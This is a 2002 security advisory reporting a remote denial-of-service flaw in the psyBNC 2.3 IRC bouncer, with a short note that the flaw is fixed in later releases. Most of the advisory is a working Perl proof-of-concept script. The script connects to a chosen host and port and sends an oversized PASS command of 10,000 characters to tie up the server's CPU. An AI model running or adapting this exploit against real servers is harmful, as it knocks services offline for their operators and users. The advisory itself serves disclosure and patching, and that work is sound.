26th Sep 2002 [SBWID-5306]
COMMAND
PsyBNC Remote Dos
SYSTEMS AFFECTED
Version 2.3
PROBLEM
dvdman [http://www.l33tsecurity.com/] posted following proof of concept
regarding a remote DoS consuming 100% CPU.
psyBNC is an easy-to-use, multi-user, permanent IRC-Bouncer with many
features. [http://www.psychoid.lam3rz.de/]
Proof Of Concept
================
#!/usr/bin/perl
#PsyBNC 2.3 Remote DDOS POC
#By DVDMAN ([email protected])
#WWW.L33TSECURITY.COM
#L33T SECURITY
use Getopt::Std;
use IO::Socket;
$|=1;
my %options;
getopt('Hhp',\%options);
$arg2 = shift(@ARGV);
$options{h} && usage();
if ($options{H})
{
do_psy();
}
if ($options{p})
{
do_psy();
}
else
{
usage();
}
sub usage()
{
print("[L33TSECURITY] PsyBNC 2.3 Remote DDOS\n");
print(" (C) DVDMAN \n\n");
print("Usage: $0 [options]\n");
print("-H = hostname or ip REQUIRED\n");
print("-p = port of PSYBNC server REQUIRED\n");
}
exit(1);
sub do_psy() {
my $test = $options{H};
my $test2 = $options{p};
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $test,
PeerPort => $test2,
);
unless ($remote) {
print"error cannot connect";
return
}
$remote->autoflush(1);
print STDERR "PsyBNC REMOTE DDOS BY DVDMAN\n";
print STDERR " starting attack in 5 seconds...\n";
sleep(5);
my $user = "USER OWNED OWNED OWNED OWNED OWNED\r\n";
my $nick = "NICK OWNED\r\n";
my $pw = "PASS " . "A"x10000;
print $remote $user;
print $remote $nick;
print $remote $pw;
print STDERR "DONE\n";
die "BYE\n";
}
#By DVDMAN ([email protected])
#WWW.L33TSECURITY.COM
#L33T SECURITY
SOLUTION
Fixed in current available 2.3 release, and in current beta version
(2.3.1).